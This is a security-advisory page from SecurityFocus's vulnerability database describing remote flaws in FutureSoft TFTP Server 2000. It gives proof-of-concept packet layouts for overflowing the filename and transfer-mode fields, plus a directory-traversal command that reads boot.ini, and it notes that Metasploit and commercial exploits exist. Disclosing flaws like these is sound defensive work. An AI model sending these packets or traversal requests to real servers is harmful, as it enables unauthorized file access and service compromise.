Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

FutureSoft TFTP Server 2000 Multiple Remote Vulnerabilities

The following proof-of-concept examples are available:

A crafted packet with an overly long filename string.
------------------------------------------
|RRQ|AAAAAAAAAAAAAAAA....|NULL|octet|NULL|
------------------------------------------

A crafted packet with an overly long transfer-mode string.
------------------------------------------
|RRQ|a.txt|NULL|AAAAAAAAAAAAAAA.....|NULL|
------------------------------------------

tftp -i 192.168.2.5 GET ../../../../../boot.ini

A Metasploit proof-of-concept exploit is available from y0@w00t-shell.net:

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.







 

Privacy Statement
Copyright 2008, SecurityFocus